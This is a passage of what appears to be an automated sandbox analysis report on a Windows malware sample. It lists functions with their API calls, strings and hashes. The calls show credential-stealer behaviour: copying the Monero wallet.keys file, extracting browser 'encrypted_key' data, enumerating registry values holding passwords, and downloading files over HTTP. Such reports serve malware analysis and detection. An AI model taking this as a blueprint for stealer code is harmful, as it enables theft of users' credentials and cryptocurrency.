                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 00796280: InternetOpenA.WININET(007B0DFE,00000001,00000000,00000000,00000000), ref: 007962E1
                                • Part of subcall function 00796280: StrCmpCA.SHLWAPI(?,014CEA08), ref: 00796303
                                • Part of subcall function 00796280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00796335
                                • Part of subcall function 00796280: HttpOpenRequestA.WININET(00000000,GET,?,014CE3D0,00000000,00000000,00400100,00000000), ref: 00796385
                                • Part of subcall function 00796280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007963BF
                                • Part of subcall function 00796280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007963D1
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007A5318
                              • lstrlen.KERNEL32(00000000), ref: 007A532F
                                • Part of subcall function 007A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007A8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 007A5364
                              • lstrlen.KERNEL32(00000000), ref: 007A5383
                              • lstrlen.KERNEL32(00000000), ref: 007A53AE
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 9b09f9008586b16d669206ba677cff88b4d878d3169619957ea4fe4f24f783dc
                              • Instruction ID: 108d78daf797993fc5e4e4d20548dce840c24decb29f8686bf1d4d932b929f4c
                              • Opcode Fuzzy Hash: 9b09f9008586b16d669206ba677cff88b4d878d3169619957ea4fe4f24f783dc
                              • Instruction Fuzzy Hash: E5511E70910148EBCB54FF60CD9AAEE7779AF92301F904228F4075A591EF3C6B56CB62
                              Function 007A12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 99aa5cdaa5562e3ef4bd5dbd14c540679a3854c4fee8b16f3fffbb8408ba732d
                              • Instruction ID: 10f2f9c1642742518d418628fa3b36325493d0f96608cfc1ae818d693380da64
                              • Opcode Fuzzy Hash: 99aa5cdaa5562e3ef4bd5dbd14c540679a3854c4fee8b16f3fffbb8408ba732d
                              • Instruction Fuzzy Hash: 23C1C7B5D41108EBCB54EF60DC8DFEA7378BB94304F004699F50AA7181DB78AA95CF92
                              Function 007A4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007A8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 007A42EC
                              • lstrcat.KERNEL32(?,014CE160), ref: 007A430B
                              • lstrcat.KERNEL32(?,?), ref: 007A431F
                              • lstrcat.KERNEL32(?,014CD480), ref: 007A4333
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007A8D90: GetFileAttributesA.KERNEL32(00000000,?,00791B54,?,?,007B564C,?,?,007B0E1F), ref: 007A8D9F
                                • Part of subcall function 00799CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00799D39
                                • Part of subcall function 007999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007999EC
                                • Part of subcall function 007999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00799A11
                                • Part of subcall function 007999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00799A31
                                • Part of subcall function 007999C0: ReadFile.KERNEL32(000000FF,?,00000000,0079148F,00000000), ref: 00799A5A
                                • Part of subcall function 007999C0: LocalFree.KERNEL32(0079148F), ref: 00799A90
                                • Part of subcall function 007999C0: CloseHandle.KERNEL32(000000FF), ref: 00799A9A
                                • Part of subcall function 007A93C0: GlobalAlloc.KERNEL32(00000000,007A43DD,007A43DD), ref: 007A93D3
                              • StrStrA.SHLWAPI(?,014CE0E8), ref: 007A43F3
                              • GlobalFree.KERNEL32(?), ref: 007A4512
                                • Part of subcall function 00799AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ny,00000000,00000000), ref: 00799AEF
                                • Part of subcall function 00799AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00794EEE,00000000,?), ref: 00799B01
                                • Part of subcall function 00799AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ny,00000000,00000000), ref: 00799B2A
                                • Part of subcall function 00799AC0: LocalFree.KERNEL32(?,?,?,?,00794EEE,00000000,?), ref: 00799B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 007A44A3
                              • StrCmpCA.SHLWAPI(?,007B08D1), ref: 007A44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007A44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 007A44E5
                              • lstrcat.KERNEL32(00000000,007B0FB8), ref: 007A44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: a75271beb1830189d39dbdabfdf44e6aaca6bd70259ab62795b60fb58825f820
                              • Instruction ID: 07729dd930e0b217a622130532790a217e91879ce7d960c44527c59ea4cbbd61
                              • Opcode Fuzzy Hash: a75271beb1830189d39dbdabfdf44e6aaca6bd70259ab62795b60fb58825f820
                              • Instruction Fuzzy Hash: 897186B6D10208ABDB14EBA0DC89FEE7379AB89300F004598F60597181EB79DB55DB92
                              Function 00791310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007912A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007912B4
                                • Part of subcall function 007912A0: RtlAllocateHeap.NTDLL(00000000), ref: 007912BB
                                • Part of subcall function 007912A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007912D7
                                • Part of subcall function 007912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007912F5
                                • Part of subcall function 007912A0: RegCloseKey.ADVAPI32(?), ref: 007912FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0079134F
                              • lstrlen.KERNEL32(?), ref: 0079135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00791377
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007A8B60: GetSystemTime.KERNEL32(007B0E1A,014CA850,007B05AE,?,?,007913F9,?,0000001A,007B0E1A,00000000,?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007A8B86
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00791465
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007999EC
                                • Part of subcall function 007999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00799A11
                                • Part of subcall function 007999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00799A31
                                • Part of subcall function 007999C0: ReadFile.KERNEL32(000000FF,?,00000000,0079148F,00000000), ref: 00799A5A
                                • Part of subcall function 007999C0: LocalFree.KERNEL32(0079148F), ref: 00799A90
                                • Part of subcall function 007999C0: CloseHandle.KERNEL32(000000FF), ref: 00799A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 007914EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 13bf9a299648f9616ca2e9ea86680c06f5c5983d63f1ba5095cf6d384f46fd0f
                              • Instruction ID: 3c79eb0e7beb3298c44f9d7715dcb5bfe476310a15995dfa11030242281e9785
                              • Opcode Fuzzy Hash: 13bf9a299648f9616ca2e9ea86680c06f5c5983d63f1ba5095cf6d384f46fd0f
                              • Instruction Fuzzy Hash: 2E5146B1D50119EBCB55FB60DC95BED737CAF55300F4042A8B60A62091EF386B85CFA6
                              Function 007975D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007972D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0079733A
                                • Part of subcall function 007972D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007973B1
                                • Part of subcall function 007972D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0079740D
                                • Part of subcall function 007972D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00797452
                                • Part of subcall function 007972D0: HeapFree.KERNEL32(00000000), ref: 00797459
                              • lstrcat.KERNEL32(00000000,007B17FC), ref: 00797606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00797648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0079765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0079768F
                              • lstrcat.KERNEL32(00000000,007B1804), ref: 007976A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007976D3
                              • lstrcat.KERNEL32(00000000,007B1808), ref: 007976ED
                              • task.LIBCPMTD ref: 007976FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: c7dd5d55c88825933f5c3be21dd780455093a45ae0d70494567cdffbcc04f6a9
                              • Instruction ID: 06fd397d58a6fa896d17f1cc1d1540929655f5a9f5090c7ce43ce2bea3be9639
                              • Opcode Fuzzy Hash: c7dd5d55c88825933f5c3be21dd780455093a45ae0d70494567cdffbcc04f6a9
                              • Instruction Fuzzy Hash: 3631A171955109DFCF48EBB4EC99DFF7374BB44301B544109F102A7290DA38AD92EB52
                              Function 007A8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,014CE010,00000000,?,007B0E2C,00000000,?,00000000), ref: 007A8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 007A8158
                              • __aulldiv.LIBCMT ref: 007A8172
                              • __aulldiv.LIBCMT ref: 007A8180
                              • wsprintfA.USER32 ref: 007A81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: ea9e2a76949b09aa890407300a68831c1a3f7128f46c012f2217ad132e418662
                              • Instruction ID: 73060272a5d2e9c13ba52b15c3db703482e6666286231b715a011bb197bff887
                              • Opcode Fuzzy Hash: ea9e2a76949b09aa890407300a68831c1a3f7128f46c012f2217ad132e418662
                              • Instruction Fuzzy Hash: E7211AB1E44218ABDB10DFD4CC49FAFB7B8FB45B10F104609F605BB280D77869018BA6
                              Function 007960A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00794839
                                • Part of subcall function 007947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00794849
                              • InternetOpenA.WININET(007B0DF7,00000001,00000000,00000000,00000000), ref: 0079610F
                              • StrCmpCA.SHLWAPI(?,014CEA08), ref: 00796147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0079618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007961B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 007961DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0079620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00796249
                              • InternetCloseHandle.WININET(?), ref: 00796253
                              • InternetCloseHandle.WININET(00000000), ref: 00796260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 2b1c22f33f2c9c41cc93bcb13c1d3c1e6a252dd401f853e0e1ef68a680fb90ee
                              • Instruction ID: 319aecddac23929ecd4eeaee8cd2516df9c29e266d038d83ba24a3b9aae9c1c3
                              • Opcode Fuzzy Hash: 2b1c22f33f2c9c41cc93bcb13c1d3c1e6a252dd401f853e0e1ef68a680fb90ee
                              • Instruction Fuzzy Hash: 1E5190B1A40208EBDF20DFA0DC49BEE77B8FB44701F108299B605A71C0DB786A85DF95
                              Function 007972D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0079733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007973B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0079740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00797452
                              • HeapFree.KERNEL32(00000000), ref: 00797459
                              • task.LIBCPMTD ref: 00797555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 881f52d00a7bda4975e3e7c108508a890f712175288488339b61e1a8b5d8f76f
                              • Instruction ID: 6128a4e9f93017223601d17786c39e69553768401ec3fe6abfbb9259683d7ef6
                              • Opcode Fuzzy Hash: 881f52d00a7bda4975e3e7c108508a890f712175288488339b61e1a8b5d8f76f
                              • Instruction Fuzzy Hash: F5613AB5914168DBDF24DB50DC45BEAB7B8BF44300F0081E9E689A6141DBB46FC9CFA1
                              Function 0079BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
